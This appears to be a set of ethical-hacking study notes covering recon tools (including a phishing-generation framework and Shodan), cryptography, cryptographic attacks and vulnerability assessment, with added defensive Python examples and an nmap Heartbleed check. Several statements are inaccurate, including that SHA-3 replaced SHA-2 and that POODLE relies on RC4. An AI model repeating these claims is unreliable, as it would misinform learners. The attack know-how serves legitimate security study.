![alt text](https://gist.githubusercontent.com/Samsar4/62886aac358c3d484a0ec17e8eb11266/raw/6fe1dc406ed480aea2acfb2e9f34d51a0536e042/maltego-WebSite-IP-Location-WhoisOnDomain-5.png "IP Address, Location")

### Social Engineering Framework (SEF)
It's an open-source Social Engineering Framework (script) that helps generate phishing attacks and fake emails; it includes phishing pages, fake email, fake email with file attachment and other stuff that helps you in a Social Engineering Attack.

![sef](https://hacknews247.com/wp-content/uploads/2018/10/20181002_212155_533793.png)

## Web Based Recon

### **[NetCraft](https://www.netcraft.com/)**
Netcraft is a website-analyzing service; with the help of this website we find basic and important information on the website like:

- **Background** — This includes basic domain information.
  - Which OS and web server is running; which ISP;
- **Network** — This includes information from IP address to domain names to nameservers.
504 | - **SSL/TLS** — This gives the ssl/tls status of the target 505 | - **Hosting History** - This gives the information on the hosting history of the target 506 | - **Sender Policy Framework (SPF)** — This describes who can send mail on the domains behalf 507 | - **DMARC** -This is a mechanism for domain owners to indicate how mail purporting to originate from their domain should be authenticated 508 | - **Web Trackers** — This trackers can be used to monitor individual user behavior across the web 509 | Site Technology — This section includes details on: 510 | - Cloud & PaaS 511 | - Server-Side technologies (e.g: PHP) 512 | - Client-Side technologies (e.g: JavaScript library) 513 | - CDN Information 514 | - CMS Information (e.g: Wordpress, Joomla, etc) 515 | - Mobile Technologies 516 | - Web stats (e.g: Web analytics, collection, etc) 517 | - Character encoding 518 | 519 | 520 | ![netcraft](https://i0.wp.com/hackingblogs.com/wp-content/uploads/2018/01/Capture-min-2.png) 521 | 522 | ### **[Shodan](https://www.shodan.io/)** 523 | *Shodan Unlike traditional search engines such as Google, use Web crawlers to traverse your entire site, but directly into the channel behind the Internet, various types of port equipment audits, and never stops looking for the Internet and all associated **servers, camera, printers, routers, and so on**.* 524 | 525 | - Some have also described it as a search engine of service banners, which are metadata that the server sends back to the client. 526 | 527 | - Shodan works well with basic, single-term searches. 
Here are the basic search filters you can use:
- **city:** find devices in a particular city
- **country:** find devices in a particular country
- **geo:** you can pass it coordinates
- **hostname:** find values that match the hostname
- **net:** search based on an IP or /x CIDR
- **os:** search based on an operating system
- **port:** find particular ports that are open
- **before/after:** find results within a timeframe

![shodan](https://logz.io/wp-content/uploads/2019/05/Shodan.png)
![shodan2](https://securityonline.info/wp-content/uploads/2017/10/shodan-1-615x1024.png)

### **[Censys](https://censys.io/overview/)**
*Alternative to Shodan.*

![censys](https://gist.githubusercontent.com/Samsar4/62886aac358c3d484a0ec17e8eb11266/raw/403be7a4514b6e0af36e0f568328372a5ce09cbf/censys.png)

-------------------------------------------------------------------------------- /20-Cryptography.md: --------------------------------------------------------------------------------

# Cryptography


### The goals of Cryptography:
- **C.I.A. + Nonrepudiation**
  - **Nonrepudiation** - means by which a recipient can ensure the identity of the sender and neither party can deny sending.

## Basic Terms & Concepts

- **Cryptography**
  - Science or study of protecting information whether in transit or at rest
  - Renders the information unusable to anyone who can't decrypt it
  - Takes plain text, applies a cryptographic method, turns it into cipher text
- **Cryptanalysis**
  - Study and methods used to crack cipher text
  - **Linear Cryptanalysis**
    - Works best on block ciphers
  - **Differential Cryptanalysis**
    - Applies to symmetric key algorithms
    - Compares differences in the inputs to how each one affects the outcome
  - **Integral cryptanalysis**
    - Input vs. output comparison, same as differential; however, runs multiple computations of the same block size input
- Plain text doesn't necessarily mean ASCII format - it simply means unencrypted data

- **Key clustering** - Different encryption keys generate the same ciphertext from the same plaintext message

## Where to **Encrypt & Decrypt**?
* **Data-in-Transit** / **Data-in-motion**: Transport / Network
  - Not much protection as it travels
  - Many different switches, routers, devices
  - Network-based protection:
    - Firewall, IPS
  - Provide transport encryption:
    - TLS, IPsec
* **Data-at-Rest**: Resides in storage
  - Hard drive, SSD, flash drive, etc.
  - Encrypt the data
    - Whole disk encryption
    - Database encryption
    - File- or folder-level encryption
  - Apply permissions
    - Access control lists
    - Only authorized users can access the data
* **Data-in-use** / **Data-in-process**: RAM & CPU
  - The data is in memory or CPU registers and cache
  - The data is almost always decrypted

## Encryption Algorithms

- **Algorithm** - step-by-step method of solving a problem
- **Two General Forms of Cryptography**
  - **Substitution** - bits are replaced by other bits
  - **Transposition** - doesn't replace; simply changes order
- **Encryption Algorithms** - mathematical formulas used to encrypt and decrypt data
  - **Stream Cipher** - readable bits are encrypted one at a time in a continuous stream
    - Usually done by an XOR operation
    - Work at a high rate of speed
  - **Block Cipher** - data bits are split up into blocks and fed into the cipher
    - Each block of data (usually 64 bits) encrypted with key and algorithm
    - Are simpler and slower than stream ciphers
- **XOR** - exclusive or; if inputs are the same (0,0 or 1,1), the function returns 0; if inputs are not the same (0,1 or 1,0), the function returns 1
  - Key chosen for the cipher must have a length larger than the data; if not, it is vulnerable to frequency attacks

## Symmetric Encryption

- **Symmetric Encryption** - One single key / session key for encryption and decryption.
> - **Known as:**
>   - Single key cryptography
>   - Secret key cryptography
>   - Shared key cryptography
>   - Session key cryptography


**One key is used to encrypt and decrypt the data.**

- Suitable for large amounts of data
- 128-bit or larger symmetric keys are common
- Harder for groups of people because more keys are needed as the group grows
- Can be very fast to use
- Less overhead than asymmetric encryption
- Often combined with asymmetric encryption

- **Problems/Weaknesses of Symmetric Encryption:**
  - Problems include key distribution and management / not scalable
  - Non-repudiation is not possible because everyone has a copy of the key
  - Key must be regenerated whenever anyone leaves the group of keyholders

### Cryptosystem
Defines key properties, communication requirements for the key exchange, and the actions performed through the encryption and decryption process.

*e.g.: Using asymmetric encryption to exchange session keys, after which the parties communicate using symmetric encryption.*

- **Key escrow** (also known as a "fair" cryptosystem) is an arrangement in which the keys needed to decrypt encrypted data are held in escrow so that, under certain circumstances, an authorized third party may gain access to those keys.

### **Symmetric Cryptosystems:**

Algorithm | Block or Streaming | Block Size | Rounds | Key Size | Notes
--|--|--|--|--|--
**DES** | Block | 64-bit | 16 | 56 bits | Uses five modes of operation: ECB, CBC, CFB, OFB and CTR.
**Blowfish** | Block | 64-bit | 16 | 32-448 bits | Public domain algorithm.
**Twofish** | Block | 128-bit | 16 | 128, 192 and 256 bits | Public domain algorithm.
**3DES** | Block | 64-bit | 16 | 168 bits (56 x 3) | Repeats the DES process 3 times.
**AES** | Block | 128-bit | 10, 12, or 14 | 128, 192 or 256 bits | Encryption standard for the US Gov.; used in WPA2
**RC4** | Streaming | N/A | 1 | 40-2048 bits | Used in WEP, SSL and TLS; largely deprecated in current technologies.
**IDEA** | Block | 64-bit | 8 | 128 bits | Made as a replacement for DES

## Asymmetric Encryption

- Larger keys than symmetric encryption; common to see key lengths of 3,072 bits or larger

**Uses a key pair:**
> - **Public Key** - Anyone can see this key; give it away
> - **Private Key** - Keep this private; used for decryption; the private key is used to digitally sign a message.


- **Algorithms:**
  - **Diffie-Hellman** - Developed as a key exchange protocol; used in SSL and IPsec; if digital signatures are waived, vulnerable to MITM attacks
  - **Elliptic Curve Cryptosystem** (ECC) - Uses points on an elliptic curve along with logarithmic problems; uses less processing power; good for mobile devices
  - **RSA** - Achieves strong encryption through the use of two large prime numbers; factoring these creates key sizes up to 4096 bits; modern de facto standard
  - **El Gamal** - Not based on prime number factoring; uses solving of discrete logarithm problems

- Only downside is that it's slower than symmetric, especially on bulk encryption and processing power

## Hashes

- **One-way encryption**
- **Verify the integrity of the message.**
- **Verify the authenticity of the message (proof of origin & non-repudiation)**
- Impossible to recover the original message from the digest
- Used to **store passwords**, providing **confidentiality**.

Hash | Digest size
--|--
MD5 | 128 bit hash
SHA-1 | 160 bit hash
SHA256 | 256 bit hash

*Examples*:
```console
String: hello world!

MD5 Hash: FC3FF98E8C6A0D3087D515C0473F8677
SHA-1 Hash: 430CE34D020724ED75A196DFC2AD67C77772D169
SHA256 Hash: 7509E5BDA0C762D2BAC7F90D758B5B2263FA01CCBC542AB5E3DF163BE08E6CA9
```

> ⚠️ If you change a single character, the entire hash value changes. **See the example below, changing the last character '!' to '.'**

* String: **hello world!**
  - ```MD5 Hash: FC3FF98E8C6A0D3087D515C0473F8677```
* String: **hello world.**
  - ```MD5 Hash: 3C4292AE95BE58E0C58E4E5511F09647```

### **Message digest**
A message digest, or hash, can be used to verify the integrity of a message by comparing the original hash to one generated after receipt of the message.
If the two match, then integrity is assured. If they do not match, then the message was altered between transmission and receipt.

> ⚠️ **Message digests are also called:**
> - hashes
> - hash values
> - hash total
> - CRC
> - fingerprint
> - checksum
> - digital ID

## Hashing Algorithms
### MD5 - Message Digest Algorithm
- First published in April 1992
- Replaced MD4
- 128-bit hash value
- 1996: Vulnerabilities found
- Not collision resistant

> ⚠️ **Collision** - occurs when two or more files create the same output
> - Can happen and can be used in an attack; rare, though

> ⚠️ **Key space** - Represents the total number of possible values of keys in a cryptographic algorithm or other security measure, such as a password

> ⚠️ **DUHK Attack** (Don't Use Hard-Coded Keys) - allows attackers to access keys in certain VPN implementations; affects devices using ANSI X9.31 with a hard-coded seed key

> ⚠️ **Rainbow Tables** - contain precomputed hashes to try to find out passwords

### SHA - Secure Hash Algorithm
- Developed by NSA
#### SHA-1
- Widely used
- 160-bit digest
- Weak; *2005: collision attacks published*

#### **SHA-2** Family
- SHA-256 | minor version: SHA-224
- SHA-512 | minor version: SHA-384

#### **SHA-3**
- Uses a hash function called Keccak and has the same digest lengths as SHA-2.
- SHA-1 and SHA-2 have been replaced by the latest iteration of SHA, known as SHA-3.

### **HMAC**
Hash Message Authentication Code - Used in conjunction with a symmetric key both to authenticate and verify the integrity of the message.
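To make the difference between a bare digest and an HMAC concrete, here is an added Python example (not code from the original notes): it computes the "hello world!" digests quoted above, measures how many bits a one-character change flips, and shows that a recomputed digest passes a plain integrity check while the HMAC does not. `SHARED_KEY` and the messages are constructed for the demo.

```python
import hashlib
import hmac

# Constructed sample values for this example; the "hello world!" digests
# it produces are the ones quoted above.
MESSAGE = b"hello world!"
SHARED_KEY = b"constructed-demo-key-do-not-reuse"  # assumption: pre-shared out of band by both sides


def digests(data: bytes) -> dict:
    """Hex digests from the three hash functions listed in the table above."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def bit_difference(hex_a: str, hex_b: str) -> int:
    """Count of differing bits between two same-length hex digests (the avalanche effect)."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def integrity_ok(data: bytes, expected_sha256: str) -> bool:
    """Bare digest comparison: detects accidental corruption, nothing more."""
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), expected_sha256)


def tag(key: bytes, data: bytes) -> str:
    """HMAC-SHA256 tag: only a holder of the shared key can compute it."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def authentic(key: bytes, data: bytes, received_tag: str) -> bool:
    """Recompute the tag over the received data and compare in constant time."""
    return hmac.compare_digest(tag(key, data), received_tag)


def tamper_demo() -> tuple:
    """Why a digest alone is not an authenticity check but an HMAC is.

    Returns (digest_check_fooled, hmac_check_fooled)."""
    sent_tag = tag(SHARED_KEY, MESSAGE)
    # Someone on the path swaps the message and recomputes the public digest.
    forged = b"hello world."
    forged_digest = hashlib.sha256(forged).hexdigest()
    digest_fooled = integrity_ok(forged, forged_digest)    # True: nothing ties the digest to a sender
    # Without SHARED_KEY the old tag is all they have; it no longer matches.
    hmac_fooled = authentic(SHARED_KEY, forged, sent_tag)  # False
    return digest_fooled, hmac_fooled
```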

- Verify data **integrity** and **authenticity**
- No fancy asymmetric encryption is required
- Used in network encryption protocols
  - IPsec, TLS
- Requires each side of the conversation to have the same key

### **RIPEMD**
RACE Integrity Primitives Evaluation Message Digest.
- Not very common
- Open standard
- 128, 160, 256, 320 bit digests *(RIPEMD-128, RIPEMD-160, RIPEMD-256, RIPEMD-320)*
- *Original RIPEMD was found to have collision issues (2004)*
- Effectively replaced with RIPEMD-160 (no known collision issues)
- Based upon the MD4 design but performs similar to SHA-1

## **Key stretching**
Combine a very long salt and a huge number of hashing iterations to make cracking even harder (e.g. hashing the hashed password `N` times).

**Two most popular key stretching libraries/functions:**
* **PBKDF2** (Password-Based Key Derivation Function 2) algorithm
  - Part of RSA public key cryptography standards (PKCS #5, RFC 2898)
* **bcrypt**
  - Generates hashes from passwords
  - An extension to the UNIX crypt library
  - Uses the Blowfish cipher to perform multiple rounds of hashing

*Example*:
* **PBKDF2**
```
Password: 123456
```

```
Hash:
rYoSDg62evyzhE1+lWBa9A==:YaeMu71c8KU3H0RYFPle0Q==
```

* **bcrypt**
```
Password: 123456
```

```
Hash:
$2b$10$vES9mCPsE10//vOc1u01XeUVmJrZyHGMPaRfo39OIUoJ2g7iPtDnu
```

> ⚠️ **Key streaming** - involves sending individual characters of the key through an algorithm and using a mathematical XOR function to change the output.
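Added Python example (not the notes' own code) of salting plus PBKDF2 key stretching as described above; it also covers the salt, pepper and key stretching defences listed later under "How to defeat attacks". `PEPPER`, the iteration count and the `pbkdf2_sha256$...` record format are assumptions for the demo, not a standard.

```python
import hashlib
import hmac
import os

# Constructed parameters for this example. In production the pepper lives
# outside the password database (config store or HSM); it is inline here so
# the demo runs offline.
PEPPER = b"constructed-demo-pepper"
ITERATIONS = 200_000      # assumption: tune so one derivation costs roughly 100 ms on your hardware
SALT_BYTES = 16           # per-user random salt, stored next to the hash


def hash_password(password: str, salt: bytes = b"", iterations: int = ITERATIONS) -> str:
    """Return a self-describing record "pbkdf2_sha256$iterations$salt_hex$hash_hex".

    A fresh random salt is drawn unless one is supplied (supplying one is for tests)."""
    salt = salt or os.urandom(SALT_BYTES)
    secret = password.encode() + PEPPER            # pepper is mixed in, never stored with the record
    dk = hashlib.pbkdf2_hmac("sha256", secret, salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Re-derive with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, dk_hex = record.split("$")
    except ValueError:
        return False                                # malformed record
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode() + PEPPER,
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def same_password_distinct_records(password: str) -> bool:
    """Two users with the same password get different records because the salts differ,
    which is what stops an attacker correlating them after a database breach."""
    first, second = hash_password(password), hash_password(password)
    return first != second and verify_password(password, first) and verify_password(password, second)
```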
## Cryptographic nonce
*Cryptographic randomization schemes*

- Used once - 'for the nonce' / for the time being
- A random or pseudo-random number
- Something that can't be reasonably guessed
- Can also be a counter
- Use a nonce during the login process
  - Server gives you a nonce
  - Calculate your password hash using the nonce
  - **Each password hash sent to the host will be different**, so a replay attack won't work

## Initialization vectors (IV)
- Is a type of nonce
- Used for randomizing an encryption scheme
- The more random the better
- Used in encryption ciphers, WEP, and older SSL implementations
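The nonce-based login described above, as an added Python exchange (not from the original notes): the server issues a nonce, the client answers with HMAC(secret, nonce), and a captured answer is refused when replayed. `USERS`, the secret and the class and function names are constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Constructed example. A real server stores a salted, stretched verifier rather
# than the raw secret; that is left out so the nonce mechanics stay visible.
USERS = {"alice": b"correct horse battery staple"}   # username -> secret shared with the server


class Server:
    def __init__(self):
        self.outstanding = {}   # nonce -> username, issued but not yet answered
        self.used = set()       # nonces already consumed; a replayed one is refused

    def challenge(self, username: str) -> str:
        """Step 1: hand the client a fresh, unguessable nonce (16 random bytes, hex)."""
        nonce = secrets.token_hex(16)
        self.outstanding[nonce] = username
        return nonce

    def login(self, username: str, nonce: str, response: str) -> bool:
        """Step 3: recompute HMAC(secret, nonce) and compare; each nonce is valid once."""
        if nonce in self.used or self.outstanding.get(nonce) != username:
            return False
        self.used.add(nonce)
        del self.outstanding[nonce]
        secret = USERS.get(username)
        if secret is None:
            return False
        expected = hmac.new(secret, nonce.encode(), hashlib.sha256).hexdigest()
        return hmac.compare_digest(expected, response)


def client_response(secret: bytes, nonce: str) -> str:
    """Step 2: prove knowledge of the secret without sending it; the value differs per nonce."""
    return hmac.new(secret, nonce.encode(), hashlib.sha256).hexdigest()


def replay_demo() -> tuple:
    """Returns (first_login_ok, replay_ok): a sniffed (nonce, response) pair is useless later."""
    server = Server()
    nonce = server.challenge("alice")
    response = client_response(USERS["alice"], nonce)
    first = server.login("alice", nonce, response)
    replay = server.login("alice", nonce, response)   # same pair again -> refused
    return first, replay
```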


## Digital Signatures

- When signing a message, you sign it with your **private** key and the recipient decrypts the hash with your **public** key
- **Digital Signature Algorithm** (DSA) - used in the generation and verification of digital signatures per FIPS 186-2

> ⚠️ **Digital Signature Standard (DSS):**
> - Document that NIST puts out to specify the digital signature algorithms & the encryption algorithms approved for use by the US gov.

## PKI System
***Public Key Infrastructure** (PKI) - structure designed to verify and authenticate the identity of individuals*
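An added toy RSA example (not from the original notes) of the sign-with-private-key / verify-with-public-key flow from the Digital Signatures section above: `P`, `Q` and `E` are demo values, and the digest is reduced mod n only because the modulus is tiny; real implementations use large primes and a padding scheme.

```python
import hashlib
from math import gcd

# Constructed toy parameters: two small primes so the numbers fit on screen.
# Real RSA uses primes of 1024 bits or more and a padding scheme (PKCS#1 v1.5
# or PSS); this only illustrates private-sign / public-verify.
P, Q = 1000003, 1000033   # assumption: demo primes, not a real key
E = 65537                 # the usual public exponent


def keygen(p: int = P, q: int = Q, e: int = E) -> tuple:
    """Return (public_key, private_key) as ((e, n), (d, n))."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)   # modular inverse of e (Python 3.8+)
    return (e, n), (d, n)


def message_digest(message: bytes, n: int) -> int:
    """SHA-256 the message, then reduce mod n so the toy modulus can hold it."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(message: bytes, private_key: tuple) -> int:
    """signature = digest^d mod n: only the private-key holder can produce this."""
    d, n = private_key
    return pow(message_digest(message, n), d, n)


def verify(message: bytes, signature: int, public_key: tuple) -> bool:
    """Anyone with the public key recovers digest = signature^e mod n and
    compares it with a fresh hash of what they received."""
    e, n = public_key
    return pow(signature, e, n) == message_digest(message, n)
```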


- Also refers to the binding of public keys to people or devices
- The certificate authority (CA)
- It's all about trust

- **X.509 v3** is the current format most widely used; part of the X.500 family of standards

### **Digital Certificates**

- **Certificate** - electronic file that is used to verify a user's identity; provides nonrepudiation

- **X.509** - standard used for digital certificates

- **Contents of a Digital Certificate:**
  - ![digi-cert](https://sites.google.com/site/amitsciscozone/_/rsrc/1468881655481/home/security/digital-certificates-explained/Digital%20Certificate%20Format.PNG)
  - **Version** - identifies certificate format
  - **Serial Number** - used to uniquely identify the certificate
  - **Subject** - who or what is being identified
  - **Algorithm ID** (Signature Algorithm) - shows the algorithm that was used to create the certificate
  - **Issuer** - shows the entity that verifies authenticity
  - **Valid From and Valid To** - dates the certificate is good for
  - **Key Usage** - what purpose the certificate serves
  - **Subject's Public Key** - copy of the subject's public key
  - **Optional Fields** - Issuer Unique Identifier, Subject Alternative Name, and Extensions

- Some root CAs are automatically added to OSes that already trust them; normally reputable companies

- **Self-Signed Certificates** - certificates that are not signed by a CA; generally not used publicly; used for development purposes
  - Signed by the same entity it certifies

**Registration Authority**
- Verifies user identity

**Certificate Authority**
- Third party to the organization; creates and issues digital certificates

**Certificate Revocation List (CRL)**
- Used to track which certificates have problems and which have been revoked

**Validation Authority**
- Used to validate certificates via Online Certificate Status Protocol (OCSP)

**Trust Model**
- How entities within an enterprise deal with keys, signatures and certificates

**Cross-Certification**
- Allows a CA to trust another CA in a completely different PKI; allows both CAs to validate certificates from either side

**Single-authority system**
- CA at the top

**Hierarchical trust system**
- CA at the top (root CA); makes use of one or more RAs (subordinate CAs) underneath it to issue and manage certificates

## **Key Wrapping and Key Encryption Keys (KEK)**
- KEKs are used as part of key distribution or key exchange.
- Key wrapping - protects session keys
- If the cipher is a symmetric KEK, both the sender and the receiver will need a copy of the same key
- If using an asymmetric cipher, with public/private key properties, to encapsulate a session key, both the sender and the receiver will need the other's public key

> ⚠️ **Protocols such as SSL, PGP, and S/MIME use the services of KEKs to provide session key confidentiality, integrity,** and sometimes to authenticate the binding of the session key originator and the session key itself.
## Full Disk Encryption - FDE

- **Data at Rest** (DAR) - data that is in a stored state and not currently accessible
- Usually protected by **full disk encryption** (FDE) with pre-boot authentication
- Examples of FDE are Microsoft BitLocker and McAfee Endpoint Encryption
- FDE also gives protection against boot-n-root

## Encrypted Communication

- **Often-Used Encrypted Communication Methods:**
  - **Secure Shell** (SSH) - secured version of telnet; uses port 22; relies on public key cryptography; SSH2 is the successor and includes SFTP

  - **Secure Sockets Layer (SSL)** - encrypts data at the transport layer and above; uses RSA encryption and digital certificates; has a six-step process; has largely been replaced by TLS

  - **Transport Layer Security (TLS)** - uses RSA 1024 and 2048 bits; successor to SSL; allows both client and server to authenticate to each other; TLS Record Protocol provides a secured communication channel

  - **Internet Protocol Security (IPSEC)** - network layer tunneling protocol; used in tunnel and transport modes; ESP encrypts each packet

  - **PGP** - Pretty Good Privacy; used for signing, compressing and encrypting emails, files and directories; known as a hybrid cryptosystem - features conventional and public key cryptography

  - **S/MIME** - standard for public key encryption and signing of MIME data; the only difference between this and PGP is that PGP can encrypt files and drives, unlike S/MIME

  - **Heartbleed** - attack on the OpenSSL heartbeat extension, which verifies data was received correctly
    - The vulnerability is that a single byte of data gets 64 KB from the server
    - This data is random; could include usernames, passwords, private keys, cookies; very easy to pull off
    - `nmap -d --script ssl-heartbleed --script-args vulns.showall -sV [host]`
    - Vulnerable versions include OpenSSL 1.0.1 and 1.0.1f
    - CVE-2014-0160

  - **FREAK (Factoring Attack on RSA-EXPORT Keys)** - man-in-the-middle attack that forces a downgrade of the RSA key to a weaker length

  - **POODLE (Padding Oracle On Downgraded Legacy Encryption)** - downgrade attack that used the vulnerability that TLS downgrades to SSL if a connection cannot be made
    - SSL 3 uses RC4, which is easy to crack
    - CVE-2014-3566
    - Also called PoodleBleed

  - **DROWN (Decrypting RSA with Obsolete and Weakened Encryption)** - affects SSL and TLS services
    - Allows attackers to break the encryption and steal sensitive data
    - Uses flaws in SSL v2
    - Not only web servers; can be IMAP and POP servers as well

## Cryptography Attacks
*Cryptographic attacks are approaches that seek to exploit one or more vulnerabilities in a cryptosystem to break it; **Note: Patterns kill! And it's all about the key!***

- **Frequency Analysis & the Ciphertext Only Attack**
  - Examine the frequency of letters appearing in the ciphertext
  - Attempt to figure out which plaintext letters they correspond to

- **Known Plain-text attack**
  - Has both plain text and cipher text; the plain text is scanned for repeatable sequences, which are compared to the cipher text

- **Chosen Cipher-text Attack**
  - Chooses a particular cipher-text message
  - Attempts to discern the key through comparative analysis
  - RSA is particularly vulnerable to this

- **Chosen Plain-text attack**
  - Attacker encrypts multiple plain-text copies in order to gain the key

- **Adaptive chosen plain-text attack**
  - Attacker makes a series of interactive queries, choosing subsequent plaintexts based on the information from the previous encryptions; the idea is to glean more and more information about the full target cipher text and key

- **Cipher-text-only attack**
  - Gains copies of several encrypted messages with the same algorithm; statistical analysis is then used to eventually reveal repeating code

- **Replay attack**
  - Usually performed within the context of a MITM attack
  - Hacker repeats a portion of a cryptographic exchange in hopes of fooling the system into setting up a communications channel
  - Doesn't know the actual data - just has to get the timing right

- **Side-Channel Attack**
  - Monitors environmental factors such as power consumption, timing and delay

- **Meet-in-the-Middle**
  - Used against algorithms that use 2 rounds of encryption (the reason that 2-DES was defeated).

- **Man-in-the-Middle**

- **Birthday Attack / Collision Attack / Reverse Hash Matching**
  - Find flaws in the one-to-one association of the hash function

- **Timing Attack**
  - Based on examining the exact execution times of the components in the cryptosystem

- **Rubber-Hose Attack**
  - Based on the use of threats or torture to extract the needed information

- **Don't Use Hard-Coded Keys (DUHK) Attack**
  - Used against hardware/software that implements ANSI X9.31 Random Number Generation.

- **Social Engineering Attack**
  - Social engineering can be very efficient for grabbing passwords, etc.

**Tools**
- Carnivore and Magic Lantern - used by law enforcement for cracking codes
- L0phtcrack - used mainly against Windows SAM files
- John the Ripper - UNIX/Linux tool for the same purpose
- PGPcrack - designed to go after PGP-encrypted systems
- CrypTool
- Cryptobench
- Jipher
- Keys should still change on a regular basis even though they may be "unhackable"
- Per the U.S. government, an algorithm using at least a 256-bit key cannot be cracked

## How to defeat attacks:

- **Salt the passwords** - A nonce most commonly associated with password randomization, making the password hash unpredictable.
  - *If the password database is breached, you can't correlate any passwords because even users with the same password have different hashes stored.*

- **Pepper** - A large constant number stored separately from the hashed password.

- **Key stretching** - Combine a very long salt and a huge number of hashing iterations to make cracking even harder (e.g. hashing the hashed password N times).

-------------------------------------------------------------------------------- /5-Vulnerability-Analysis.md: --------------------------------------------------------------------------------

# Vulnerability Analysis

## Def.

**Attackers** perform VA to identify security loopholes in the target's network and end devices. The identified vulnerabilities are used by attackers to further exploit the target network.

**VA Researchers**: VA has an important role to play in an organization's security against different internal and external threats.
To secure a network, an administrator needs to perform patch management, install proper antivirus software, check configuration, solve known issues in third-party applications, and troubleshoot hardware default configurations. All these activities together constitute vulnerability assessment.

In this section we will learn:
- Vulnerability Assessment Concepts
- Vulnerability Classification and Assessment Types
- Vulnerability Assessment Solutions and Tools
- Vulnerability Assessment Reports

## Vulnerability Assessment Concepts:

There are two causes of vulnerable systems in a network:
1. Misconfiguration in software or hardware
2. Poor programming practices

Attackers leverage these vulnerabilities to perform different attacks on an organizational resource.
We will be covering vulnerability assessment, vulnerability scoring systems, vulnerability databases, and the vulnerability assessment life cycle.
## Vulnerability Research

It is the process of analyzing protocols, services, and configurations to discover the vulnerabilities and design flaws that will expose an OS and its applications to exploit, attack, or misuse.

An administrator needs vulnerability research:
- To gather information about security trends, newly discovered threats, attack surfaces, attack vectors and techniques
- To find weaknesses in the OS and applications and alert the network administrator before a network attack
- To understand information that helps prevent security problems
- To know how to recover from a network attack

An ethical hacker needs to keep up with the most recently discovered vulnerabilities and exploits to stay one step ahead of the attackers through vulnerability research, which includes:
- Discovering the system design faults and weaknesses that might allow attackers to compromise a system
- Staying updated about new products and technologies and reading news related to current exploits
- Checking underground hacking web sites (deep and dark web sites) for newly discovered vulnerabilities and exploits
- Checking newly released alerts regarding relevant innovations and product improvements for security systems

Security experts and vulnerability scanners classify vulnerabilities by:
- Severity level (low, medium, high)
- Exploit range (local or remote)

## Resources for Vulnerability Research

The following are some of the online websites used to perform vulnerability research:

- Microsoft Vulnerability Research (MSVR) (https://www.microsoft.com)
- Dark Reading (https://www.darkreading.com)
- SecurityTracker (https://securitytracker.com)
- Trend Micro (https://www.trendmicro.com)
- Security Magazine (https://www.securitymagazine.com)
- PenTest Magazine (https://pentestmag.com)
- SC Magazine (https://www.scmagazine.com)
- Exploit Database (https://www.exploit-db.com)
- SecurityFocus (https://www.securityfocus.com)
- Help Net Security (https://www.helpnetsecurity.com)
- HackerStorm (http://www.hackerstorm.co.uk)
- Computerworld (https://www.computerworld.com)
- WindowsSecurity (http://www.windowsecurity.com)
- D'Crypt (https://www.d-crypt.com)

## What is Vulnerability Assessment?

A vulnerability assessment is an in-depth examination of the ability of a system or application, including current security procedures and controls, to withstand exploitation. It scans networks for known security weaknesses, and recognizes, measures, and classifies security vulnerabilities in computer systems, networks, and communication channels. It identifies, quantifies, and ranks possible vulnerabilities to threats in a system. Additionally, it assists security professionals in securing the network by identifying security loopholes or vulnerabilities in the current security mechanism before attackers can exploit them.

A vulnerability assessment may be used to:

- Identify weaknesses that could be exploited
- Predict the effectiveness of additional security measures in protecting information resources from attack

Typically, vulnerability-scanning tools search network segments for IP-enabled devices and enumerate systems, operating systems, and applications to identify vulnerabilities resulting from vendor negligence, system or network administration activities, or day-to-day activities. Vulnerability-scanning software scans the computer against the Common Vulnerabilities and Exposures (CVE) index and security bulletins provided by the software vendor.
Vulnerability scanners are capable of identifying the following information:

- The OS version running on computers or devices
- IP and Transmission Control Protocol/User Datagram Protocol (TCP/UDP) ports that are listening
- Applications installed on computers
- Accounts with weak passwords
- Files and folders with weak permissions
- Default services and applications that might have to be uninstalled
- Errors in the security configuration of common applications
- Computers exposed to known or publicly reported vulnerabilities
- EOL/EOS software information
- Missing patches and hotfixes
- Weak network configurations and misconfigured or risky ports
- Help to verify the inventory of all devices on the network

There are two approaches to network vulnerability scanning:

- **Active Scanning**: The attacker interacts directly with the target network to find vulnerabilities. Active scanning helps in simulating an attack on the target network to uncover vulnerabilities that can be exploited by the attacker.

  **Example**: An attacker sends probes and specially crafted requests to the target host in the network to identify vulnerabilities.

- **Passive Scanning**: The attacker tries to find vulnerabilities without directly interacting with the target network. The attacker identifies vulnerabilities via information exposed by systems during normal communications. Passive scanning identifies the active operating systems, applications, and ports throughout the target network, monitoring activity to determine its vulnerabilities. This approach provides information about weaknesses but does not provide a path for directly combating attacks.

  **Example**: An attacker guesses the operating system information, applications, and application and service versions by observing the TCP connection setup and teardown.
## Vulnerability-Management Life Cycle

The process helps identify and remediate any potential security weaknesses before they can be exploited.

- **Identify Assets and Create a Baseline**

  This phase identifies critical assets and prioritizes them to define the risk based on the criticality and value of each system. This creates a good baseline for vulnerability management. This phase involves the gathering of information about the identified systems to understand the approved ports, software, drivers, and basic configuration of each system in order to develop and maintain a system baseline.

- **Vulnerability Scan**

  This phase is very crucial in vulnerability management. In this step, the security analyst performs the vulnerability scan on the network to identify the known vulnerabilities in the organization's infrastructure. Vulnerability scans can also be performed against applicable compliance templates to assess the organization's infrastructure weaknesses against the respective compliance guidelines.

- **Risk Assessment**

